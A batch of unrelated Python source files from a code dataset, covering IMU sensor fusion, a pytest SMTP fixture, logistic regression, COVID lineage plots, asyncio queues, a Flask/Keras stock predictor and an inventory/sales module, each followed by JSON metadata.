(math.atan2(ACCz,ACCx)+M_PI)*RAD_TO_DEG\n\n####################################################################\t\n##########Direction Requirement####Correct rotation value###########\n####################################################################\n#Change the rotation value of the accelerometer to -/+ 180 and\n#move the Y axis '0' point to up.\n#\n#Two different pieces of code are used depending on how your IMU is mounted.\n#If IMU is up the correct way, IC's facing the sky, Use these lines\nAccXangle -= 180.0\nif AccYangle > 90:\n\tAccYangle -= 270.0\nelse:\n\tAccYangle += 90.0\n#\n#\n#If IMU is upside down, IC's facing the Earth, using these lines\n#if AccXangle >180:\n# AccXangle -= 360.0\n#AccYangle-=90\n#if (AccYangle >180):\n# AccYangle -= 360.0\n############################ END ##################################\n\n\n#Complementary filter used to combine the accelerometer and gyro values.\nCFangleX=AA*(CFangleX+rate_gyr_x*LP) +(1 - AA) * AccXangle\nCFangleY=AA*(CFangleY+rate_gyr_y*LP) +(1 - AA) * AccYangle\n\n#Kalman filter used to combine the accelerometer and gyro values.\nkalmanY = kalmanFilterY(AccYangle, rate_gyr_y,LP)\nkalmanX = kalmanFilterX(AccXangle, rate_gyr_x,LP)\n\n####################################################################\n##########Direction Requirement#######MAG direction ################\n####################################################################\n#If IMU is upside down, then use this line. It isnt needed if the\n# IMU is the correct way up\n#MAGy = -MAGy\n#\n############################ END ##################################\n\n\n#Calculate heading with Radian to Degree conversion\nheading = 180 * math.atan2(MAGy,MAGx)/M_PI\n\n#Only have our heading between 0 and 360\nif heading < 0:\n\theading += 360\n\n\n#Normalize accelerometer raw values.\naccXnorm = ACCx/math.sqrt(ACCx * ACCx + ACCy * ACCy + ACCz * ACCz)\naccYnorm = ACCy/math.sqrt(ACCx * ACCx + ACCy * ACCy + ACCz * ACCz)\n\n\n####################################################################\n##########Direction Requirement#####Calculate pitch and roll########\n####################################################################\n#Us these two lines when the IMU is right side up. IC's facing sky \npitch = math.asin(accXnorm)\nroll = -math.asin(accYnorm/math.cos(pitch))\n#\n#Us these four lines when the IMU is upside down. IC's facing earth\n#accXnorm = -accXnorm\t\t\t\t#flip Xnorm as the IMU is upside down\n#accYnorm = -accYnorm\t\t\t\t#flip Ynorm as the IMU is upside down\n#pitch = math.asin(accXnorm)\n#roll = math.asin(accYnorm/math.cos(pitch))\n#\n############################ END ##################################\n\n#Calculate the new tilt compensated values\nmagXcomp = MAGx*math.cos(pitch)+MAGz*math.sin(pitch)\nmagYcomp = MAGx*math.sin(roll)*math.sin(pitch)+MAGy*math.cos(roll)-MAGz*math.sin(roll)*math.cos(pitch)\n\n#Calculate tilt compensated heading w/ Radian to Degree conversion\ntiltCompensatedHeading = 180 * math.atan2(magYcomp,magXcomp)/M_PI\n\nif tiltCompensatedHeading < 0:\n\ttiltCompensatedHeading += 360\n\n\n#Error checking Section for trouble shooting\n#if 0: #1:\t\t\t#Change to '1' to show the angles from the accelerometer\n# print (\"\\033[1;34;40mACCX Angle %5.2f ACCY Angle %5.2f \\033[0m \" % (AccXangle, AccYangle)),\n#\n#if 0: #1:\t\t\t#Change to '0' to stop showing the angles from the gyro\n# print (\"\\033[1;31;40m\\tGRYX Angle %5.2f GYRY Angle %5.2f GYRZ Angle %5.2f\" % (gyroXangle,gyroYangle,gyroZangle)),\n\n#if 0: #1:\t\t\t#Change to '0' to stop showing the angles from the complementary filter\n# print (\"\\033[1;35;40m \\tCFangleX Angle %5.2f \\033[1;36;40m CFangleY Angle %5.2f \\33[1;32;40m\" % (CFangleX,CFangleY)),\n\t\n#if 0: #1:\t\t\t#Change to '0' to stop showing the heading\n# print (\"HEADING %5.2f \\33[1;37;40m tiltCompensatedHeading %5.2f\" % (heading,tiltCompensatedHeading)),\n\t\n#if 0: #1:\t\t\t#Change to '0' to stop showing the angles from the Kalman filter\n# print (\"\\033[1;31;40m kalmanX %5.2f \\033[1;35;40m kalmanY %5.2f \" % (kalmanX,kalmanY))\n\n\n#slow program down a bit, makes the output more readable\n#time.sleep(0.5) #disable while not using loop features\n#break #this is disabliling the while loop for Node.js Control\n#n = n + 1\n#Output to stdout if running stand alone or passed to node.js control program through flush call\n#print(\"%d,%5.2f,%5.2f,%5.2f,%5.2f,%5.2f,%5.2f,%5.2f,%5.8f,%5.2f,%5.2f,%5.2f\" % (n, AccXangle, AccYangle, gyroXangle,gyroYangle,gyroZangle,CFangleX,CFangleY, heading, tiltCompensatedHeading, kalmanX,kalmanY))\n#print(\"%5.8f\" % (heading))\nsys.stdout.write(\"%5.8f\" % (heading))\n\n#sys.stdout.flush()\n#sys.exit(heading)\n","sub_path":"homebase/paddle/rotator/IMU_Acc_Mag_Gyro.py","file_name":"IMU_Acc_Mag_Gyro.py","file_ext":"py","file_size_in_byte":15373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"74558139","text":"# content of conftest.py\nimport pytest\nimport smtplib\n\n@pytest.fixture(scope=\"module\",\n params=[\"smtp.163.com\",\"smtp.126.com\"]\n )\ndef smtp(request):\n smtp = smtplib.SMTP(request.params)\n def fin():\n print(\"teardown smtp\")\n smtp.close()\n request.addfinalizer(fin)\n return smtp\n","sub_path":"demo/code/2015-12-14/pytest-fixture/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"247056723","text":"import numpy\nfrom math import exp\nfrom numpy.numarray import zeros\nfrom urllib.request import urlopen\n\ndef llength(data):\n x, _ = data[0]\n return len(x)\n\ndef get_data():\n result = []\n\n file = urlopen(\"http://archive.ics.uci.edu/ml/machine-learning-databases/breast-cancer-wisconsin/wdbc.data\")\n for line in file.readlines():\n array = line.decode(\"utf-8\").split(',')\n result.append(([1.0] + [float(f) for f in array[2:]], 1 if array[1] == \"M\" else -1))\n\n rlen = llength(result)\n x_min, x_max = numpy.array([1e10] * rlen), zeros(rlen)\n for (x, _) in result:\n for i in range(rlen):\n x_min[i] = min(x_min[i], x[i])\n x_max[i] = max(x_max[i], x[i])\n for (x, _) in result:\n for i in range(rlen):\n x[i] = (x[i] - x_min[i]) / (x_max[i] - x_min[i]) if x_max[i] != x_min[i] else 1\n\n return result\n\n\ndef norm(x):\n return numpy.sqrt(numpy.inner(x, x))\n\ndef function(x, c=1):\n return c / (1 + exp(x))\n\ndef calculate_error(data, w):\n count = 0\n for (x, y) in data:\n cl = 1.0 if function(-numpy.inner(x, w)) >= 0.5 else -1.0\n if cl != y:\n count += 1\n return count / len(data)\n\ndef linear_regression_w(data, c, exp_value=20, eps=0.1, rate=0.01):\n m = llength(data)\n w = numpy.zeros(m)\n dif_prev = 0\n while True:\n w_prev = numpy.array(w)\n for (x, y) in data:\n grad = numpy.zeros(m)\n for j in range(m):\n v = y * numpy.inner(w, x)\n if v < exp_value:\n grad[j] += function(v, y * x[j])\n if j != 0:\n grad[j] += c * w[j]\n w += rate * grad\n dif_norm = norm(w - w_prev)\n if dif_prev < dif_norm and dif_prev != 0:\n break\n else:\n dif_prev = dif_norm\n if dif_norm < eps:\n break\n\n return w\n\ndef cross_validate(data, c, n=10):\n step = len(data) // n\n result = 0\n for i in range(0, len(data), step):\n w = linear_regression_w(data[i + step:] + data[:i], c)\n result += calculate_error(data[i:i + step], w)\n return result / n\n\n\ndef get_constant(data, base=3, n=10):\n result, min_error = 1, 1\n\n for d in range(n):\n c = base ** -d\n error = cross_validate(data, c)\n print(\"current deg = %d, current const = %f, current err = %f\" % (d, c, error))\n if error < min_error:\n min_error = error\n result = c\n\n return result\n\ndef main():\n data = get_data()\n numpy.random.shuffle(data)\n test_len = int(len(data) * 0.2)\n xs, ys = data[test_len:], data[:test_len]\n\n c = get_constant(xs)\n e = calculate_error(ys, w)\n print('regularization constant = %f' % c)\n print('error = %6.2f' % (100 * e))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"sergey.muravyov/lab_4/logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":2829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"500326362","text":"import urllib.request as ur\n\ndef open_url(url):\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'}\n req = ur.Request(url=url, headers=headers) # python2,urllib.request()\n response = ur.urlopen(req) # python2,urllib2.urlopen()\n return response.read().decode('utf-8')\n\nurl = \"https://www.kaggle.com/c/youtube8m\"\nprint (open_url(url))","sub_path":"conment.py","file_name":"conment.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"49011319","text":"#!/usr/bin/env\n# -*- coding: utf-8 -*-\n# filename = core\n# author=SluttyScience\n# date = 7/31/17\n\"\"\" filename = core\"\"\"\nfrom __future__ import absolute_import, unicode_literals\nfrom startups import *\nimport sys, os\nimport _regex_core\nimport regex\nfrom startups.core import AttrDict, OrderedSet\nfrom requests.structures import CaseInsensitiveDict\nfrom collections import defaultdict\nfrom fractions import Fraction, Decimal, _RATIONAL_FORMAT\nfrom toolz import merge\nfrom operator import and_\n#from startups.regular._util import Property, ids_to_value\nimport sre_constants\nfrom _regex_core import (GLOBAL_FLAGS, V1 as version, _get_required_string, OP, CHARSET_ESCAPES,\nREGEX_FLAGS, SCOPED_FLAGS, DEFAULT_FLAGS, PROPERTY_NAMES, PROPERTIES, CASE_FLAGS\n )\nfrom regex import _METACHARS as METACHARS\n\n\ndef requires_class(x):\n\tdef class_name(obj):\n\t\tfrom twisted.python.reflect import _determineClassName\n\t\treturn _determineClassName(obj) == x\n\treturn class_name\n\n\n\n\nREVERSE = _regex_core.REVERSE\nSUCCESS = OP.SUCCESS\n\n\nPROPERTIES = regex._regex.get_properties()\nP = AttrDict(PROPERTIES)\n\ndef is_binary(tup):\n\tname = tup[0]\n\tprop_val = tup[-1]\n\treturn 'YES' in prop_val\n\nBINARY = {'F': 0, 'FALSE': 0, 'N': 0, 'NO': 0, 'T': 1, 'TRUE': 1, 'Y': 1, 'YES': 1}\nBINARY_PROPERTIES = {k: v[0] for k, v in P.items() if is_binary(v)}\nBINARY_ITEMS = sorted(BINARY_PROPERTIES.items(), key=lambda x: x[1])\nNON_BINARY_PROPERTIES = {k: v for k, v in P.items() if not is_binary(v)}\nNON_BINARY_ITEMS = {k: v[0] for k, v in NON_BINARY_PROPERTIES.items()}\n_NBI = sorted(NON_BINARY_ITEMS.items(), key=lambda x: x[1])\nnon_binary_dict = defaultdict(OrderedSet)\nbinary_dict = defaultdict(OrderedSet)\n\nfor k, v in NON_BINARY_ITEMS.items():\n\tnon_binary_dict[v].add(k)\nfor k,v in BINARY_PROPERTIES.items():\n\tbinary_dict[v].add(k)\n\t\ncombined_dict = merge(non_binary_dict, binary_dict)\n\n\n\n\nfrom _regex_core import (CHARSET_ESCAPES, POS_TEXT, CASE_TEXT, CHARACTER_ESCAPES,\n\nis_octal, is_hexadecimal,\n )\n\n\nESCAPES = dict()\nESCAPES.update(CHARSET_ESCAPES)\nESCAPES.update(CHARACTER_ESCAPES)\n\nESCAPE_MAPPINGS = dict(\n\t\td = '0',\n\t\tD = 'x',\n\t\ts = ' ',\n\t\tS = 'x',\n\t\tw = 'x',\n\t\tW = '!',\n)\nHEX_ESCAPES = dict([('U', 8), ('u', 4), ('x', 2)])\n\n\n\n\n#\\xXX Matches the Unicode codepoint with 2-digit hex code XX.\n#\\UXXXXXXXX Matches the Unicode codepoint with 8-digit hex code XXXXXXXX.\n#\\uXXXX Matches the Unicode codepoint with 4-digit hex code XXXX.\n#\\N{name}\n#\\K Keeps only what follows for the entire match.\n#\\g Matches the text matched by the group named name.\n#\\number Matches the contents of the group of the same number if\n# number is no more than 2 digits, otherwise the character\n# with the 3-digit octal code.\n#\".\" Matches any character except a newline.\n#\".\",DOTALL Matches any character.\n\"\"\"\n\n'%(ok)s' % {'ok':1}\n[...] Indicates a set of characters. A \"^\" as the first\n character indicates a complementing set.\n(?flags-flags) VERSION1: Sets/clears the flags for the remainder of\n the group or pattern; VERSION0: Sets the flags for the\n entire pattern.\n(?:...) Non-capturing version of regular parentheses.\n(?>...) Atomic non-capturing version of regular parentheses.\n(?P=name) Matches the text matched earlier by the group named\n name.\n(?#...) A comment; ignored.\n(?=...) Matches if ... matches next, but doesn't consume the\n string.\n(?(DEFINE)...) If there's no group called \"DEFINE\", then ... will be\n ignored, but any group definitions will be available.\n(?|...|...) (?|A|B), creates an RE that will match either A or B,\n but reuses capture group numbers across the\n alternatives.\n\ncode(argcount, kwonlyargcount, nlocals, stacksize, flags, codestring,\nconstants, names, varnames, filename, name, firstlineno,\nlnotab[, freevars[, cellvars]])\n\n\n\nco_argcount operator.attrgetter('__code__.co_argcount')\nco_kwonlyargcount operator.attrgetter('__code__.co_kwonlyargcount')\nco_nlocals\nco_stacksize\nco_flags\nco_code\nco_consts operator.attrgetter('__code__.co_consts')\nco_names operator.attrgetter('__code__.co_names')\nco_varnames operator.attrgetter('__code__.co_varnames')\nco_filename\nco_name\nco_firstlineno\nco_lnotab\nco_freevars operator.attrgetter('__code__.co_freevars')\nco_cellvars operator.attrgetter('__code__.co_cellvars')\n\n##\n('co_argcount',\n 'co_kwonlyargcount',\n 'co_nlocals',\n 'co_stacksize',\n 'co_flags',\n 'co_code',\n 'co_consts',\n 'co_names',\n 'co_varnames',\n 'co_filename',\n 'co_name',\n 'co_firstlineno',\n 'co_lnotab',\n 'co_freevars',\n 'co_cellvars')\n\n\n\n\n\nSplit the source string by the occurrences of the pattern, returning a\nlist containing the resulting substrings. If capturing parentheses are used\nin pattern, then the text of all groups in the pattern are also returned as\npart of the resulting list. If maxsplit is nonzero, at most maxsplit splits\noccur, and the remainder of the string is returned as the final element of\nthe list.\n\n\n< search (pattern, string, flags=0, pos=None, endpos=None, partial=False, concurrent=None, **kwargs)>\n\n\nregex.finditer\n\n\narg(regex.findall)\n\n\nexpandf(...)\nexpandf(format) --> string.\nReturn the string obtained by using the format, as done by the subf() method.\n\n\n\n span(...)\n | span([group1, ...]) --> 2-tuple of int or tuple of 2-tuple of ints.\n | Return the span (a 2-tuple of the indices of the start and end) of one or\n | more subgroups of the match. If there is a single argument, the result is a\n | span, or (-1, -1) if the group did not contribute to the match; if there are\n | multiple arguments, the result is a tuple with one item per argument; if\n | there are no arguments, the span of the whole match is returned. Group 0 is\n | the whole match.\n |\n\n\nspans and starts and ends is for captures\nspan and start and end is for groups\n\n\nendpos; The final position beyond which the regex engine won't search.\npos: The position at which the regex engine starting searching.\nre: The regex object that produced this match object.\nregs: A tuple of the spans of the capturing groups.\nstring: The string that was searched, or None if it has been detached.\n\n\n\n\nself.partial\nself.string\nself.flags = self.re.flags\n\nself.re = cls\nself.pattern = self.re.pattern\nself.named_lists = self.re.named_lists\n\nself.group_names = self.pattern.groupindex.keys()\n\n\n#_fields\n\n\nPD =('pattern',\n 'flags',\n 'code',\n 'group_index',\n 'index_group',\n 'named_lists',\n 'named_list_indexes',\n 'req_offset',\n 'req_chars',\n 'req_flags',\n 'group_count')\n\n\n\n\n\"\"\"\n\n\ndef get_regular(obj):\n\tfrom inspect import signature\n\tsig = signature(obj)\n\treturn [(x.name, x.default) for x in sig.parameters.values()\n\t if x.kind in (x.POSITIONAL_ONLY, x.POSITIONAL_OR_KEYWORD, x.VAR_POSITIONAL)]\n\n\ndef num_pos_args(obj):\n\t\"\"\" Return the number of positional arguments. ``f(x, y=1)`` has 1\"\"\"\n\tfrom inspect import signature\n\tsigspec = signature(obj)\n\treturn sum(1 for x in sigspec.parameters.values()\n\t if x.kind == x.POSITIONAL_OR_KEYWORD\n\t and x.default is x.empty)\n\n\n\ndef get_exclude_keywords(obj):\n\t\"\"\" Return the names of position-only arguments if func has **kwargs\"\"\"\n\tfrom inspect import signature\n\tsigspec = signature(obj)\n\tnum_pos_only = num_pos_args(obj)\n\tif num_pos_only == 0:\n\t\treturn ()\n\thas_kwargs = any(x.kind == x.VAR_KEYWORD for x in sigspec.parameters.values())\n\tif not has_kwargs:\n\t\treturn ()\n\tpos_args = list(sigspec.parameters.values())[:num_pos_only]\n\treturn tuple(x.name for x in pos_args)\n\n\n\ndef get_arguments(func):\n\tfrom inspect import signature\n\tsigspec = signature(func)\n\treturn list(sigspec.parameters.values())\n\n\ndef def_overlapped_findall(pattern, string, flags=0, pos=None, endpos=None):\n\treturn regex.findall(pattern, string, flags=flags, pos=pos, endpos=endpos)\n\n\n\ndef get_find(pattern, string, flags=0, partial=False, overlapped=True, pos=None, endpos=None):\n\tif not isinstance(pattern, str):\n\t\tflags = pattern.flags\n\t\tpattern = pattern.pattern\n\t\t\n\treturn regex.finditer(pattern, string=string, flags=flags, partial=partial, overlapped=overlapped, pos=pos, endpos=endpos)\n\n\ndef get_fullmatch(string, pos, endpos, partial=True): pass\n\n\n\n\ndef get_partial_search(pattern, string, flags, pos=None, endpos=None):\n\treturn regex.search(pattern, string, flags, pos=pos, endpos=endpos, partial=True)\n\n\n\n\n\ndef return_partial_endpos(string, endpos, partial=True): pass\n\n\n\n\n\n\nif __name__ == '__main__': print(__file__)","sub_path":"startups/regular/_core.py","file_name":"_core.py","file_ext":"py","file_size_in_byte":9018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"329113106","text":"# Makes rarefaction plots for a set of genomes.\n\nfrom covid_bronx.variants import parse_nextclade\nimport pandas as pd\nfrom tqdm import tqdm\nimport os\nimport matplotlib.pyplot as plt\nimport plot_helper\nfrom plot_helper import Plotter\n\ninput_file = 'wadsworth/bronx.json'\noutput_folder = 'wadsworth'\n\nplot_helper.BASE_FILEPATH = output_folder\nplot_helper.SHOW = True\n\ndf = pd.read_csv(\"wadsworth/GISIAD_Meta_Bronx.csv\")\n\nlineages = df['Lineage']\nlineages.index = df['Collection date']\nlineages = lineages.sort_index()\n\ndate_range = pd.date_range(lineages.index.min(), lineages.index.max())\n\npdf = pd.DataFrame(index=date_range, columns = set(lineages)).fillna(0)\n\nfor d,l in lineages.items():\n try:\n pdf.loc[d,l] += 1\n except:\n pass\n\ncdf = pdf.cumsum()\ncdf = cdf[cdf.iloc[-1].sort_values(ascending=False).index]\n\nwith Plotter(filename='lineages_gisaid.pdf', figsize=(20,20)) as ax:\n cdf.loc[:, cdf.iloc[-1]>2000].plot(ax=ax, cmap='tab20b')\n ax.set_xlabel(\"Date\")\n ax.set_ylabel(\"Count\")\n ax.set_title(\"Bronx Rarefaction of Most Common Lineages\")\n\na, b = parse_nextclade(input_file)\n\nmeta = []\nvariants = []\n\nfor i in tqdm(range(41)):\n a,b = parse_nextclade(f\"gisaid_jan21/output_{i}.json\")\n meta.append(a)\n variants.append(b)\n\nda = pd.concat(meta)\ndb = pd.concat(variants)\ndb['country'] = db['seqName'].apply(lambda x: x.split(\"/\")[0])\n \ndates = {r['Virus name']: r['Collection date'] for _,r in df.iterrows()} \nb['Date'] = b['seqName'].apply(lambda x: x.split(\"|\")[0]).map(dates)\n\n# spike = b[(b['position']>26523)&(b['position']<=27191)]\nspike = b[(b['position']>21563)&(b['position']<=25384)]\nspike.index = spike['Date']\nspike = spike.sort_index()\nspike['Variant'] = spike['mutation'] + \" \" + spike['aaMutation'].apply(str)\nvariants = spike['Variant'].dropna()\n\ndate_range2 = pd.date_range(spike.index.min(), spike.index.max())\n\npdf2 = pd.DataFrame(index=date_range, columns = set(variants)).fillna(0)\n\nfor d,l in variants.items():\n pdf2.loc[d,l] += 1\n\ncdf2 = pdf2.cumsum()\ncdf2 = cdf2[cdf2.iloc[-1].sort_values(ascending=False).index]\n\nwith Plotter(filename='spike_variants.pdf', figsize=(20,20)) as ax:\n cdf2.loc[:, (cdf2.iloc[-1]>2) & (cdf2.iloc[-1]<100)].plot(ax=ax, cmap='tab20b')\n ax.set_xlabel(\"Date\")\n ax.set_ylabel(\"Count\")\n ax.set_title(\"Bronx Rarefaction of Most Common Spike Variants\")\n\ndef cave_plot(df, ax=None, **kwargs):\n\n if ax:\n object = ax\n else:\n object = plt\n\n bottom = 0.\n for col in df.columns:\n top = df[col] + bottom\n object.fill_between(df.index, bottom, top, label=col, **kwargs)\n bottom = top\n\n return object\n\nratios = (cdf.T / cdf.T.sum()).T\n\nwith Plotter(filename='gisaid_lineages_cave.pdf', figsize=(20,20)) as ax:\n ax = cave_plot(ratios, ax, cmap='tab20b')\n plt.legend(loc='upper left')\n ax.set_title(\"Ratios of Lineages in World Over Time\")\n ax.set_xlabel(\"Date\")\n ax.set_ylabel(\"Relative Abundance\")\n\nratios2 = (cdf2.T / cdf2.T.sum()).T\n\nwith Plotter(filename='variants_cave.pdf', figsize=(20,20)) as ax:\n ax = cave_plot(ratios2.loc[:, (cdf2.iloc[-1]>1)], ax, cmap='tab20b')\n plt.legend(loc='upper left')\n ax.set_title(\"Ratios of Variants in Bronx Over Time\")\n ax.set_xlabel(\"Date\")\n ax.set_ylabel(\"Relative Abundance\")\n\nwith Plotter(filename='variants_cave_full.pdf', figsize=(20,20)) as ax:\n ax = cave_plot(ratios2, ax, cmap='tab20b')\n plt.legend(loc='upper left')\n ax.set_title(\"Ratios of Variants in Bronx Over Time\")\n ax.set_xlabel(\"Date\")\n ax.set_ylabel(\"Relative Abundance\") ","sub_path":"scripts/variants/rarefaction.py","file_name":"rarefaction.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"631937057","text":"import asyncio\nimport itertools\n\n\nasync def listwords(alphabets, length: int, queue):\n for alph in alphabets:\n for word in itertools.product(alph, repeat=length):\n await queue.put(word)\n print(f\"producer finished\")\n await queue.put(None)\n\n\nasync def worker(i, queue): \n print(f\"worker-{i} started\")\n while True:\n word = await queue.get()\n if word is None:\n await queue.put(None)\n print(f\"worker-{i} found sentinel\")\n queue.task_done()\n break\n else:\n # do something with result here:\n await asyncio.sleep(0.01)\n queue.task_done()\n\n\nasync def main(nworkers, qsize, alphabets, length):\n from asyncio import create_task\n queue = asyncio.Queue(qsize)\n producer = create_task(listwords(alphabets, length, queue))\n workers = (create_task(worker(i, queue)) for i in range(nworkers)) \n await asyncio.gather(producer, *workers)\n\n\nif __name__ == \"__main__\":\n import time\n start = time.perf_counter()\n nworkers = 5\n qsize = 100\n alphabets = ('ABC','RAD','OLD','POT','YEP')\n asyncio.run(\n main(nworkers, qsize, alphabets, 6)\n )\n runtime = time.perf_counter() - start\n print(f\"Took {runtime}s\")\n","sub_path":"queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"98509990","text":"from SNN import neuron\n\n\n\ndef create_neurons(num_layers=0, num_neurons=0, debug=True):\n neurons = []\n for layer in range(num_layers):\n if debug:\n print ('create_neurons(): Creating layer {}'.format(layer))\n neuron_layer = []\n for count in range(num_neurons):\n neuron_layer.append(neuron.LIF(debug=debug))\n neurons.append(neuron_layer)\n return neurons","sub_path":"SNN/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"277800485","text":"# APP ROUTINE\n# ===========\nfrom flask import Flask, request, render_template\n\napp = Flask(__name__)\n\n@app.route('/')\ndef home():\n\treturn render_template('home.html')\n\n@app.route('/getstockprice',methods=['POST','GET'])\ndef get_delay():\n if request.method=='POST':\n result = request.form\n\n print('request received:', result['TICKER'])\n\n # LIBRARIES\n # =========\n from keras.models import model_from_json\n from keras.optimizers import Adam\n import pandas as pd\n from sklearn.preprocessing import MinMaxScaler, StandardScaler\n from utils import create_dataset, load_model_from_disk\n import numpy as np\n from dateutil.relativedelta import relativedelta\n import datetime\n\n # PARAMETERS\n # =========\n look_back = 5 # LSTM lookback\n lag = 2 # based on yesterday's prices, predict tomorrow's (no info on today's close)\n learning_rate = 0.0001\n\n # load network, weights and compile model\n # =======================================\n try:\n loaded_model = load_model_from_disk(model_from_json)\n A = Adam(lr=learning_rate)\n loaded_model.compile(loss='mse', optimizer=A)\n\n except FileNotFoundError:\n print('no model found!')\n exit()\n\n\n # get the data\n # ============\n print('loading data')\n df = pd.read_csv('prices.csv', header=0)\n other_features = pd.read_csv('prices.csv', header=0)\n\n # TICKER SELECTION\n # ================\n ticker = result['TICKER']\n\n print('TICKER: ', ticker)\n\n if ticker not in df.symbol.unique():\n print('no ticker {}!'.format(ticker))\n exit()\n\n ticker_data = df[df['symbol'] == ticker]\n ticker_data_feats = other_features[other_features['symbol'] == ticker]\n # the output variable\n stock_price = ticker_data.close.values.astype('float32')\n stock_price = stock_price.reshape(len(stock_price), 1)\n\n features = list(set(ticker_data_feats.columns) - set(['date', 'symbol']))\n\n # SCALE\n # =====\n scaler = MinMaxScaler(feature_range=(0, 1))\n stock_price = scaler.fit_transform(stock_price)\n\n feature_scaler = StandardScaler()\n ticker_data_feats = feature_scaler.fit_transform(ticker_data_feats[features].values)\n\n # LOOK BACK\n # =========\n X, Y = create_dataset(stock_price, look_back, lag=lag)\n\n # RESHAPE LSTM STYLE\n # ==================\n X = np.reshape(X, (X.shape[0], 1, X.shape[1]))\n\n # PREDICT\n # =====\n yhat = loaded_model.predict([X, ticker_data_feats])\n\n # OUTPUT DATA\n # ===========\n ts = pd.DataFrame(stock_price[look_back+1:], columns=['actual'])\n ts['ticker'] = ticker\n ts['pred'] = scaler.inverse_transform(yhat.ravel())\n ts['actual'] = scaler.inverse_transform(ts['actual'])\n ts['date'] = ticker_data[look_back+1:]['date'].values\n ts['error'] = abs(ts['pred'] - ts['actual'])/ts['actual']\n print('RMSE: ', (abs(ts['pred'] - ts['actual'])/ts['actual']).mean() ) #0.032\n\n\n try:\n output = output.append(ts)\n except NameError:\n output = pd.DataFrame(ts)\n\n output.to_csv('scoring_out.csv', index=False)\n\n # SEND VALUES\n # ===========\n OUT_DATE = \"{:%Y-%m-%d}\".format(datetime.datetime.strptime(result['OUT_DATE'], \"%Y-%m-%d\")\n + relativedelta(days=1))\n PREV_DATE = \"{:%Y-%m-%d}\".format(datetime.datetime.strptime(result['OUT_DATE'], \"%Y-%m-%d\"))\n\n prev_value = output[output.date == PREV_DATE]['actual'].values\n # just over the weekend\n if prev_value < 1:\n print('weekend', prev_value)\n PREV_DATE = \"{:%Y-%m-%d}\".format(datetime.datetime.strptime(result['OUT_DATE'], \"%Y-%m-%d\")\n - relativedelta(days=3))\n prev_value = output[output.date == PREV_DATE]['actual'].values\n\n app_result = {'OUT_DATE': OUT_DATE}\n app_result['OUT_VALUE'] = output[output.date == OUT_DATE]['pred']\n app_result['OUT_DELTA'] = prev_value - \\\n output[output.date == OUT_DATE]['pred'].values\n\n\n return render_template('result.html', out_date=app_result['OUT_DATE'],\n out_value=app_result['OUT_VALUE'].values,\n out_delta=app_result['OUT_DELTA'])\n\nif __name__ == '__main__':\n\tapp.run()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"384284636","text":"from datetime import datetime\nfrom collections import Counter\n\ndef registrar_producto(productos, producto):\n \"\"\"\n Registrar un nuevo producto en el inventario.\n \"\"\"\n productos.append(producto)\n\ndef realizar_venta(ventas, venta):\n \"\"\"\n Crea una nueva venta\n \"\"\"\n venta['fecha'] = datetime.now()\n ventas.append(venta)\n\ndef buscar_producto(productos, id_producto):\n \"\"\"\n Busca un producto a partir de su ID.\n \"\"\"\n for p in productos:\n if p['id_producto'] == id_producto:\n return p\n \n return None\n\ndef cambiar_estado_producto(producto):\n \"\"\"\n Cambia el estado de un producto.\n \"\"\"\n producto['disponible'] = not producto['disponible']\n\ndef ventas_rango_fecha(ventas, fecha_inicio, fecha_final):\n \"\"\"\n Obtiene las ventas que se han realizado en un rango de fecha.\n \"\"\"\n ventas_rango = []\n\n for v in ventas:\n if fecha_inicio <= v['fecha'] <= fecha_final:\n ventas_rango.append(v)\n \n return ventas_rango\n\ndef top_5_mas_vendidos(ventas):\n \"\"\"\n Obtiene el top 5 de los productos más vendidos.\n \"\"\"\n conteo_ventas = {}\n\n for v in ventas:\n if v['id_producto'] in conteo_ventas:\n conteo_ventas[v['id_producto']] += v['cantidad']\n else:\n conteo_ventas[v['id_producto']] = v['cantidad']\n\n conteo_ventas = {k: v for k, v in sorted(conteo_ventas.items(), key=lambda item: item[1], reverse=True)}\n\n contador = Counter(conteo_ventas)\n\n return contador.most_common(5)\n\ndef top_5_menos_vendidos(ventas):\n \"\"\"\n Obtiene el top 5 de los productos menos vendidos.\n \"\"\"\n conteo_ventas = {}\n\n for v in ventas:\n if v['id_producto'] in conteo_ventas:\n conteo_ventas[v['id_producto']] += v['cantidad']\n else:\n conteo_ventas[v['id_producto']] = v['cantidad']\n\n conteo_ventas = {k: v for k, v in sorted(conteo_ventas.items(), key=lambda item: item[1])}\n\n contador = Counter(conteo_ventas)\n\n return contador.most_common()[:-6:-1]\n\ndef mostrar_datos_producto(producto):\n \"\"\"\n Muestra los datos particulares de un producto.\n \"\"\"\n print('Nombre: %s' % producto['nombre'])\n print('ID: %i' % producto['id_producto'])\n print('Precio: $%.2f' % producto['precio'])\n print('Cantidad: %i' % producto['cantidad'])\n print('¿Disponible?: %s' % ('Sí' if producto['disponible'] else 'No'))\n\ndef mostrar_datos_venta(productos, venta):\n \"\"\"\n Muestra los datos particulares de una venta.\n \"\"\"\n print('ID Producto: %i' % venta['id_producto'])\n print('Fecha: %s' % venta['fecha'])\n print('Cantidad: %i' % venta['cantidad'])\n print('Total sin IGV: $%.2f' % venta['total_sin_igv'])\n print('Total:: $%.2f' % 